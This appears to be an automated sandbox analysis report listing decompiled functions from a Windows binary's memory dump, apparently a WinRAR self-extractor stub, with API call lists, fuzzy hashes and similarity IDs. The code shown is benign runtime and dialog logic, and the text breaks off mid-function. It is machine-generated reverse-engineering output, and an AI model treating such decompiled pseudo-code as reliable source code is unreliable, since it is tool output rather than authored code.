                                                                            • SetWindowTextW.USER32(?,00000000), ref: 001A90E3
                                                                            • ShowWindow.USER32(00000000,00000005), ref: 001A90F9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Window$Show$RectText
                                                                            • String ID: RarHtmlClassName
                                                                            • API String ID: 3937224194-1658105358
                                                                            • Opcode ID: 603318e0f62a723c8a832a6d673e02bd75a4c7cb09c3ed9d2be903c879d8e250
                                                                            • Instruction ID: dd1c84765059df3351f47ab8c144b5edc79b73a4c34480b9326dc85fa362698c
                                                                            • Opcode Fuzzy Hash: 603318e0f62a723c8a832a6d673e02bd75a4c7cb09c3ed9d2be903c879d8e250
                                                                            • Instruction Fuzzy Hash: D931CD35104314AFCB219F64AC48F9BBFA8FF49761F004569F94AAA4A2CB31D881CB61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E001BB506(intOrPtr _a4) {
                                                                            				void* _t18;
                                                                            
                                                                            				_t45 = _a4;
                                                                            				if(_a4 != 0) {
                                                                            					E001BB4CA(_t45, 7);
                                                                            					E001BB4CA(_t45 + 0x1c, 7);
                                                                            					E001BB4CA(_t45 + 0x38, 0xc);
                                                                            					E001BB4CA(_t45 + 0x68, 0xc);
                                                                            					E001BB4CA(_t45 + 0x98, 2);
                                                                            					E001B7A50( *((intOrPtr*)(_t45 + 0xa0)));
                                                                            					E001B7A50( *((intOrPtr*)(_t45 + 0xa4)));
                                                                            					E001B7A50( *((intOrPtr*)(_t45 + 0xa8)));
                                                                            					E001BB4CA(_t45 + 0xb4, 7);
                                                                            					E001BB4CA(_t45 + 0xd0, 7);
                                                                            					E001BB4CA(_t45 + 0xec, 0xc);
                                                                            					E001BB4CA(_t45 + 0x11c, 0xc);
                                                                            					E001BB4CA(_t45 + 0x14c, 2);
                                                                            					E001B7A50( *((intOrPtr*)(_t45 + 0x154)));
                                                                            					E001B7A50( *((intOrPtr*)(_t45 + 0x158)));
                                                                            					E001B7A50( *((intOrPtr*)(_t45 + 0x15c)));
                                                                            					return E001B7A50( *((intOrPtr*)(_t45 + 0x160)));
                                                                            				}
                                                                            				return _t18;
                                                                            			}





                                                                            APIs
                                                                              • Part of subcall function 001BB4CA: _free.LIBCMT ref: 001BB4F3
                                                                            • _free.LIBCMT ref: 001BB554
                                                                              • Part of subcall function 001B7A50: RtlFreeHeap.NTDLL(00000000,00000000,?,001BB4F8,?,00000000,?,00000000,?,001BB51F,?,00000007,?,?,001BB91C,?), ref: 001B7A66
                                                                              • Part of subcall function 001B7A50: GetLastError.KERNEL32(?,?,001BB4F8,?,00000000,?,00000000,?,001BB51F,?,00000007,?,?,001BB91C,?,?), ref: 001B7A78
                                                                            • _free.LIBCMT ref: 001BB55F
                                                                            • _free.LIBCMT ref: 001BB56A
                                                                            • _free.LIBCMT ref: 001BB5BE
                                                                            • _free.LIBCMT ref: 001BB5C9
                                                                            • _free.LIBCMT ref: 001BB5D4
                                                                            • _free.LIBCMT ref: 001BB5DF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                            • String ID:
                                                                            • API String ID: 776569668-0
                                                                            • Opcode ID: 47c67bb6ac6dc7fd170de8bd6b40a79d5f713bdac9f6b7190701213f35d3a31d
                                                                            • Instruction ID: 42e77a36b4e25560d73a7a3b2dab7b4044e9e55fd76e4f596ac158a2c7e35d9b
                                                                            • Opcode Fuzzy Hash: 47c67bb6ac6dc7fd170de8bd6b40a79d5f713bdac9f6b7190701213f35d3a31d
                                                                            • Instruction Fuzzy Hash: 9011FC72548B04AAD660B7B0CC8AFCF77DC6F54B00F444815F79F76493DBA9B6088660
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 95%
                                                                            			E001B1694(void* __ecx, void* __edx) {
                                                                            				void* _t4;
                                                                            				void* _t11;
                                                                            				void* _t16;
                                                                            				long _t26;
                                                                            				void* _t29;
                                                                            
                                                                            				if( *0x1cd680 != 0xffffffff) {
                                                                            					_t26 = GetLastError();
                                                                            					_t11 = E001B288E(__eflags,  *0x1cd680);
                                                                            					__eflags = _t11 - 0xffffffff;
                                                                            					if(_t11 == 0xffffffff) {
                                                                            						L5:
                                                                            						_t11 = 0;
                                                                            					} else {
                                                                            						__eflags = _t11;
                                                                            						if(__eflags == 0) {
                                                                            							_t4 = E001B28C8(__eflags,  *0x1cd680, 0xffffffff);
                                                                            							_pop(_t16);
                                                                            							__eflags = _t4;
                                                                            							if(_t4 != 0) {
                                                                            								_t29 = E001B7B1B(_t16, 1, 0x28);
                                                                            								__eflags = _t29;
                                                                            								if(__eflags == 0) {
                                                                            									L8:
                                                                            									_t11 = 0;
                                                                            									E001B28C8(__eflags,  *0x1cd680, 0);
                                                                            								} else {
                                                                            									__eflags = E001B28C8(__eflags,  *0x1cd680, _t29);
                                                                            									if(__eflags != 0) {
                                                                            										_t11 = _t29;
                                                                            										_t29 = 0;
                                                                            										__eflags = 0;
                                                                            									} else {
                                                                            										goto L8;
                                                                            									}
                                                                            								}
                                                                            								E001B7A50(_t29);
                                                                            							} else {
                                                                            								goto L5;
                                                                            							}
                                                                            						}
                                                                            					}
                                                                            					SetLastError(_t26);
                                                                            					return _t11;
                                                                            				} else {
                                                                            					return 0;
                                                                            				}
                                                                            			}









                                                                            APIs
                                                                            • GetLastError.KERNEL32(?,?,001B168B,001AF0E2), ref: 001B16A2
                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 001B16B0
                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001B16C9
                                                                            • SetLastError.KERNEL32(00000000,?,001B168B,001AF0E2), ref: 001B171B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: ErrorLastValue___vcrt_
                                                                            • String ID:
                                                                            • API String ID: 3852720340-0
                                                                            • Opcode ID: 1186e7154e1f004ec6fbce2f86055a49711e6ac1a108e36eac9f173aa3eaa898
                                                                            • Instruction ID: 1625f1f1b23fb599237d2f218607139491309abbc7dc4dbfb79d844b030f6bc9
                                                                            • Opcode Fuzzy Hash: 1186e7154e1f004ec6fbce2f86055a49711e6ac1a108e36eac9f173aa3eaa898
                                                                            • Instruction Fuzzy Hash: 8E012B722093217FA7252B757C96DE73F88EB217717B2063AF114564E2EFA18C50D254
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 77%
                                                                            			E001AD27B() {
                                                                            				intOrPtr _t1;
                                                                            				_Unknown_base(*)()* _t3;
                                                                            				void* _t5;
                                                                            				_Unknown_base(*)()* _t6;
                                                                            				struct HINSTANCE__* _t14;
                                                                            
                                                                            				_t1 =  *0x1efe58;
                                                                            				if(_t1 != 1) {
                                                                            					if(_t1 == 0) {
                                                                            						_t14 = GetModuleHandleW(L"KERNEL32.DLL");
                                                                            						if(_t14 != 0) {
                                                                            							_t3 = GetProcAddress(_t14, "AcquireSRWLockExclusive");
                                                                            							if(_t3 == 0) {
                                                                            								goto L5;
                                                                            							} else {
                                                                            								 *0x1efe5c = _t3;
                                                                            								_t6 = GetProcAddress(_t14, "ReleaseSRWLockExclusive");
                                                                            								if(_t6 == 0) {
                                                                            									goto L5;
                                                                            								} else {
                                                                            									 *0x1efe60 = _t6;
                                                                            								}
                                                                            							}
                                                                            						} else {
                                                                            							L5:
                                                                            							_t14 = 1;
                                                                            						}
                                                                            						asm("lock cmpxchg [edx], ecx");
                                                                            						if(0 != 0 || _t14 != 1) {
                                                                            							if(0 != 1) {
                                                                            								_t5 = 1;
                                                                            							} else {
                                                                            								goto L12;
                                                                            							}
                                                                            						} else {
                                                                            							L12:
                                                                            							_t5 = 0;
                                                                            						}
                                                                            						return _t5;
                                                                            					} else {
                                                                            						return 1;
                                                                            					}
                                                                            				} else {
                                                                            					return 0;
                                                                            				}
                                                                            			}









                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                            • API String ID: 0-1718035505
                                                                            • Opcode ID: 20619957e4e6a5b1db5a677108ddb8282ba1d6a9e7b81d4a49300212281b64ab
                                                                            • Instruction ID: f7d488e33d2f757c44c50fe933e5a96113ee9479b5c70a0c4f16f0f1bafbee31
                                                                            • Opcode Fuzzy Hash: 20619957e4e6a5b1db5a677108ddb8282ba1d6a9e7b81d4a49300212281b64ab
                                                                            • Instruction Fuzzy Hash: FD01447A640BA24B4F301FF43CA4BAB2B949B13B06312003FF842D3E10E760D882D790
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 65%
                                                                            			E001A0910(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4) {
                                                                            				char _v16;
                                                                            				struct _SYSTEMTIME _v32;
                                                                            				struct _SYSTEMTIME _v48;
                                                                            				struct _FILETIME _v64;
                                                                            				struct _FILETIME _v72;
                                                                            				intOrPtr _v76;
                                                                            				struct _FILETIME _v84;
                                                                            				intOrPtr _t47;
                                                                            				long _t61;
                                                                            				intOrPtr* _t66;
                                                                            				long _t72;
                                                                            				intOrPtr _t73;
                                                                            				intOrPtr* _t76;
                                                                            
                                                                            				_t73 = __edx;
                                                                            				_t66 = _a4;
                                                                            				_t76 = __ecx;
                                                                            				_v48.wYear =  *_t66;
                                                                            				_v48.wMonth =  *((intOrPtr*)(_t66 + 4));
                                                                            				_v48.wDay =  *((intOrPtr*)(_t66 + 8));
                                                                            				_v48.wHour =  *((intOrPtr*)(_t66 + 0xc));
                                                                            				_v48.wMinute =  *((intOrPtr*)(_t66 + 0x10));
                                                                            				_v48.wSecond =  *((intOrPtr*)(_t66 + 0x14));
                                                                            				_v48.wMilliseconds = 0;
                                                                            				_v48.wDayOfWeek.wYear = 0;
                                                                            				if(SystemTimeToFileTime( &_v48,  &_v64) == 0) {
                                                                            					 *_t76 = 0;
                                                                            					 *((intOrPtr*)(_t76 + 4)) = 0;
                                                                            				} else {
                                                                            					if(E0019A995() >= 0x600) {
                                                                            						FileTimeToSystemTime( &_v64,  &_v32);
                                                                            						__imp__TzSpecificLocalTimeToSystemTime(0,  &_v32,  &_v16);
                                                                            						SystemTimeToFileTime( &(_v32.wDayOfWeek),  &_v84);
                                                                            						SystemTimeToFileTime( &(_v48.wDayOfWeek),  &(_v72.dwHighDateTime));
                                                                            						_t61 = _v84.dwHighDateTime + _v72.dwLowDateTime;
                                                                            						asm("sbb eax, [esp+0x24]");
                                                                            						asm("sbb eax, edi");
                                                                            						asm("adc eax, edi");
                                                                            						_t72 = 0 - _v72.dwHighDateTime.dwLowDateTime + _v84.dwLowDateTime + _v76;
                                                                            						asm("adc eax, edi");
                                                                            					} else {
                                                                            						LocalFileTimeToFileTime( &_v64,  &_v72);
                                                                            						_t61 = _v72.dwHighDateTime.dwLowDateTime;
                                                                            						_t72 = _v72.dwLowDateTime;
                                                                            					}
                                                                            					 *_t76 = E001ADDC0(_t72, _t61, 0x64, 0);
                                                                            					 *((intOrPtr*)(_t76 + 4)) = _t73;
                                                                            				}
                                                                            				_t47 =  *((intOrPtr*)(_t66 + 0x18));
                                                                            				 *_t76 =  *_t76 + _t47;
                                                                            				asm("adc [esi+0x4], edi");
                                                                            				return _t47;
                                                                            			}

















                                                                            APIs
                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 001A096E
                                                                              • Part of subcall function 0019A995: GetVersionExW.KERNEL32(?), ref: 0019A9BA
                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 001A0990
                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 001A09AA
                                                                            • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 001A09BB
                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 001A09CB
                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 001A09D7
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Time$File$System$Local$SpecificVersion
                                                                            • String ID:
                                                                            • API String ID: 2092733347-0
                                                                            • Opcode ID: e2464f1ddb08fa5ec7259ae04265b553a85f5e506937105337574f9fa6809828
                                                                            • Instruction ID: 361081953bbc81c7d050645d0b353979780455e0c7f0a684c250d59097cbe486
                                                                            • Opcode Fuzzy Hash: e2464f1ddb08fa5ec7259ae04265b553a85f5e506937105337574f9fa6809828
                                                                            • Instruction Fuzzy Hash: A131C27A1083469BC704DFA9C880DABB7E8BF98704F04491EF999C3210E734D549CB6A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 96%
                                                                            			E001A8BE2(signed int _a4, intOrPtr _a8, signed int* _a12) {
                                                                            				void* _t16;
                                                                            				signed int _t22;
                                                                            				void* _t25;
                                                                            				signed int _t30;
                                                                            				signed int* _t34;
                                                                            
                                                                            				_t34 = _a12;
                                                                            				if(_t34 != 0) {
                                                                            					_t32 = _a8;
                                                                            					_t25 = 0x10;
                                                                            					if(E001AF3CA(_a8, 0x1c40bc, _t25) == 0) {
                                                                            						L13:
                                                                            						_t30 = _a4;
                                                                            						 *_t34 = _t30;
                                                                            						L14:
                                                                            						 *((intOrPtr*)( *_t30 + 4))(_t30);
                                                                            						_t16 = 0;
                                                                            						L16:
                                                                            						return _t16;
                                                                            					}
                                                                            					if(E001AF3CA(_t32, 0x1c40fc, _t25) != 0) {
                                                                            						if(E001AF3CA(_t32, 0x1c40dc, _t25) != 0) {
                                                                            							if(E001AF3CA(_t32, 0x1c40ac, _t25) != 0) {
                                                                            								if(E001AF3CA(_t32, 0x1c414c, _t25) != 0) {
                                                                            									if(E001AF3CA(_t32, 0x1c409c, _t25) != 0) {
                                                                            										 *_t34 =  *_t34 & 0x00000000;
                                                                            										_t16 = 0x80004002;
                                                                            										goto L16;
                                                                            									}
                                                                            									goto L13;
                                                                            								}
                                                                            								_t30 = _a4;
                                                                            								_t22 = _t30 + 0x10;
                                                                            								L11:
                                                                            								asm("sbb ecx, ecx");
                                                                            								 *_t34 =  ~_t30 & _t22;
                                                                            								goto L14;
                                                                            							}
                                                                            							_t30 = _a4;
                                                                            							_t22 = _t30 + 0xc;
                                                                            							goto L11;
                                                                            						}
                                                                            						_t30 = _a4;
                                                                            						_t22 = _t30 + 8;
                                                                            						goto L11;
                                                                            					}
                                                                            					_t30 = _a4;
                                                                            					_t22 = _t30 + 4;
                                                                            					goto L11;
                                                                            				}
                                                                            				return 0x80004003;
                                                                            			}









                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: _memcmp
                                                                            • String ID:
                                                                            • API String ID: 2931989736-0
                                                                            • Opcode ID: d80cb04d8242f098c8c657c681107f13a381cf80cf5bc47a21309486b6dfce5b
                                                                            • Instruction ID: d59b43435420b61cf164992c1ff60c541033ca8a89a2cf83eb799160a52c2060
                                                                            • Opcode Fuzzy Hash: d80cb04d8242f098c8c657c681107f13a381cf80cf5bc47a21309486b6dfce5b
                                                                            • Instruction Fuzzy Hash: AF210D7564410AABDB145A11CC81FBBB3ACAF62764F04413DFC0497105F730ED469BB1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 72%
                                                                            			E001B8516(void* __ebx, void* __ecx, void* __edx) {
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				intOrPtr _t2;
                                                                            				void* _t3;
                                                                            				void* _t4;
                                                                            				intOrPtr _t9;
                                                                            				void* _t11;
                                                                            				void* _t20;
                                                                            				void* _t21;
                                                                            				void* _t23;
                                                                            				void* _t25;
                                                                            				void* _t27;
                                                                            				void* _t29;
                                                                            				void* _t31;
                                                                            				void* _t32;
                                                                            				long _t36;
                                                                            				long _t37;
                                                                            				void* _t40;
                                                                            
                                                                            				_t29 = __edx;
                                                                            				_t23 = __ecx;
                                                                            				_t20 = __ebx;
                                                                            				_t36 = GetLastError();
                                                                            				_t2 =  *0x1cd6ac; // 0x6
                                                                            				_t42 = _t2 - 0xffffffff;
                                                                            				if(_t2 == 0xffffffff) {
                                                                            					L2:
                                                                            					_t3 = E001B7B1B(_t23, 1, 0x364);
                                                                            					_t31 = _t3;
                                                                            					_pop(_t25);
                                                                            					if(_t31 != 0) {
                                                                            						_t4 = E001B9BA9(_t25, _t36, __eflags,  *0x1cd6ac, _t31);
                                                                            						__eflags = _t4;
                                                                            						if(_t4 != 0) {
                                                                            							E001B8388(_t25, _t31, 0x1f0418);
                                                                            							E001B7A50(0);
                                                                            							_t40 = _t40 + 0xc;
                                                                            							__eflags = _t31;
                                                                            							if(_t31 == 0) {
                                                                            								goto L9;
                                                                            							} else {
                                                                            								goto L8;
                                                                            							}
                                                                            						} else {
                                                                            							_push(_t31);
                                                                            							goto L4;
                                                                            						}
                                                                            					} else {
                                                                            						_push(_t3);
                                                                            						L4:
                                                                            						E001B7A50();
                                                                            						_pop(_t25);
                                                                            						L9:
                                                                            						SetLastError(_t36);
                                                                            						E001B7AD8(_t20, _t29, _t31, _t36);
                                                                            						asm("int3");
                                                                            						_push(_t20);
                                                                            						_push(_t36);
                                                                            						_push(_t31);
                                                                            						_t37 = GetLastError();
                                                                            						_t21 = 0;
                                                                            						_t9 =  *0x1cd6ac; // 0x6
                                                                            						_t45 = _t9 - 0xffffffff;
                                                                            						if(_t9 == 0xffffffff) {
                                                                            							L12:
                                                                            							_t32 = E001B7B1B(_t25, 1, 0x364);
                                                                            							_pop(_t27);
                                                                            							if(_t32 != 0) {
                                                                            								_t11 = E001B9BA9(_t27, _t37, __eflags,  *0x1cd6ac, _t32);
                                                                            								__eflags = _t11;
                                                                            								if(_t11 != 0) {
                                                                            									E001B8388(_t27, _t32, 0x1f0418);
                                                                            									E001B7A50(_t21);
                                                                            									__eflags = _t32;
                                                                            									if(_t32 != 0) {
                                                                            										goto L19;
                                                                            									} else {
                                                                            										goto L18;
                                                                            									}
                                                                            								} else {
                                                                            									_push(_t32);
                                                                            									goto L14;
                                                                            								}
                                                                            							} else {
                                                                            								_push(_t21);
                                                                            								L14:
                                                                            								E001B7A50();
                                                                            								L18:
                                                                            								SetLastError(_t37);
                                                                            							}
                                                                            						} else {
                                                                            							_t32 = E001B9B53(_t25, _t37, _t45, _t9);
                                                                            							if(_t32 != 0) {
                                                                            								L19:
                                                                            								SetLastError(_t37);
                                                                            								_t21 = _t32;
                                                                            							} else {
                                                                            								goto L12;
                                                                            							}
                                                                            						}
                                                                            						return _t21;
                                                                            					}
                                                                            				} else {
                                                                            					_t31 = E001B9B53(_t23, _t36, _t42, _t2);
                                                                            					if(_t31 != 0) {
                                                                            						L8:
                                                                            						SetLastError(_t36);
                                                                            						return _t31;
                                                                            					} else {
                                                                            						goto L2;
                                                                            					}
                                                                            				}
                                                                            			}






















                                                                            APIs
                                                                            • GetLastError.KERNEL32(?,001D00E0,001B3394,001D00E0,?,?,001B2E0F,?,?,001D00E0), ref: 001B851A
                                                                            • _free.LIBCMT ref: 001B854D
                                                                            • _free.LIBCMT ref: 001B8575
                                                                            • SetLastError.KERNEL32(00000000,?,001D00E0), ref: 001B8582
                                                                            • SetLastError.KERNEL32(00000000,?,001D00E0), ref: 001B858E
                                                                            • _abort.LIBCMT ref: 001B8594
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: ErrorLast$_free$_abort
                                                                            • String ID:
                                                                            • API String ID: 3160817290-0
                                                                            • Opcode ID: 43ae47a42be7982fd17b152471535e127e5f5033eebb9394b887aac6066efa0c
                                                                            • Instruction ID: e5b2684c1e183bf758b71bd7ad60c194078b4e3c118f53a4afe383e3e2adf5a2
                                                                            • Opcode Fuzzy Hash: 43ae47a42be7982fd17b152471535e127e5f5033eebb9394b887aac6066efa0c
                                                                            • Instruction Fuzzy Hash: CDF0C87624460067D32633397C0AFEF265D9BE1F61B290125F519A31D1EF74CA42C161
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 83%
                                                                            			E001AC2A7(void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
                                                                            				void* _t12;
                                                                            				WCHAR* _t16;
                                                                            				void* _t17;
                                                                            				struct HWND__* _t18;
                                                                            				intOrPtr _t19;
                                                                            				void* _t20;
                                                                            				signed short _t23;
                                                                            
                                                                            				_t16 = _a16;
                                                                            				_t23 = _a12;
                                                                            				_t19 = _a8;
                                                                            				_t18 = _a4;
                                                                            				if(E001912D7(_t17, _t18, _t19, _t23, _t16, L"RENAMEDLG", 0, 0) != 0) {
                                                                            					L10:
                                                                            					return 1;
                                                                            				}
                                                                            				_t20 = _t19 - 0x110;
                                                                            				if(_t20 == 0) {
                                                                            					 *0x1ede34 = _t16;
                                                                            					SetDlgItemTextW(_t18, 0x66, _t16);
                                                                            					SetDlgItemTextW(_t18, 0x68,  *0x1ede34);
                                                                            					goto L10;
                                                                            				}
                                                                            				if(_t20 != 1) {
                                                                            					L5:
                                                                            					return 0;
                                                                            				}
                                                                            				_t12 = (_t23 & 0x0000ffff) - 1;
                                                                            				if(_t12 == 0) {
                                                                            					GetDlgItemTextW(_t18, 0x68,  *0x1ede34, 0x800);
                                                                            					_push(1);
                                                                            					L7:
                                                                            					EndDialog(_t18, ??);
                                                                            					goto L10;
                                                                            				}
                                                                            				if(_t12 == 1) {
                                                                            					_push(0);
                                                                            					goto L7;
                                                                            				}
                                                                            				goto L5;
                                                                            			}











                                                                            APIs
                                                                              • Part of subcall function 001912D7: GetDlgItem.USER32(00000000,00003021), ref: 0019131B
                                                                              • Part of subcall function 001912D7: SetWindowTextW.USER32(00000000,001C22E4), ref: 00191331
                                                                            • EndDialog.USER32(?,00000001), ref: 001AC2F2
                                                                            • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 001AC308
                                                                            • SetDlgItemTextW.USER32(?,00000066,?), ref: 001AC322
                                                                            • SetDlgItemTextW.USER32(?,00000068), ref: 001AC32D
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: ItemText$DialogWindow
                                                                            • String ID: RENAMEDLG
                                                                            • API String ID: 445417207-3299779563
                                                                            • Opcode ID: 62f6ecd31f371bea9c22edfea39d4575c4b0158a2638bc706f602aec7d51cb83
                                                                            • Instruction ID: 0c7855cd9c2b306aefbb93c9947379c8b520639ee0b5720186c0ea1f6737d2ba
                                                                            • Opcode Fuzzy Hash: 62f6ecd31f371bea9c22edfea39d4575c4b0158a2638bc706f602aec7d51cb83
                                                                            • Instruction Fuzzy Hash: 8501D8366403157AD6115BA86D89F3B7B6CFB6BB00F10402AF241B6490C7A2AC159BB5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 37%
                                                                            			E001B6B78(void* __ecx, void* __esi, intOrPtr _a4) {
                                                                            				signed int _v8;
                                                                            				signed int _v12;
                                                                            				signed int _t10;
                                                                            				intOrPtr* _t20;
                                                                            				signed int _t22;
                                                                            
                                                                            				_t10 =  *0x1cd668; // 0x44aa1787
                                                                            				_v8 = _t10 ^ _t22;
                                                                            				_v12 = _v12 & 0x00000000;
                                                                            				_t12 =  &_v12;
                                                                            				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
                                                                            				if(_t12 != 0) {
                                                                            					_t20 = GetProcAddress(_v12, "CorExitProcess");
                                                                            					if(_t20 != 0) {
                                                                            						 *0x1c2260(_a4);
                                                                            						_t12 =  *_t20();
                                                                            					}
                                                                            				}
                                                                            				if(_v12 != 0) {
                                                                            					_t12 = FreeLibrary(_v12);
                                                                            				}
                                                                            				return E001AE203(_t12, _v8 ^ _t22);
                                                                            			}









                                                                            APIs
                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,001B6B29,?,?,001B6AC9,?,001CA800,0000000C,001B6C20,?,00000002), ref: 001B6B98
                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 001B6BAB
                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,001B6B29,?,?,001B6AC9,?,001CA800,0000000C,001B6C20,?,00000002,00000000), ref: 001B6BCE
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                            • API String ID: 4061214504-1276376045
                                                                            • Opcode ID: 5cb2c058a3dcd2580abcba5a1aff8ed59dbc25283600d9a88129cf60e8457989
                                                                            • Instruction ID: c3d0faab771c636c60443134dd7876e1fd5fa24b15d7b847c8a69cd07ed45dde
                                                                            • Opcode Fuzzy Hash: 5cb2c058a3dcd2580abcba5a1aff8ed59dbc25283600d9a88129cf60e8457989
                                                                            • Instruction Fuzzy Hash: 56F04931A05219BBCB159BA0DD09FAEBFB8EB14715F000069F809E26A0DB748E94CB94
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E0019E7E3(struct HINSTANCE__** __ecx) {
                                                                            				void* _t5;
                                                                            				struct HINSTANCE__* _t6;
                                                                            				struct HINSTANCE__** _t9;
                                                                            
                                                                            				_t9 = __ecx;
                                                                            				if(__ecx[1] == 0) {
                                                                            					_t6 = E0019FCFD(L"Crypt32.dll");
                                                                            					 *__ecx = _t6;
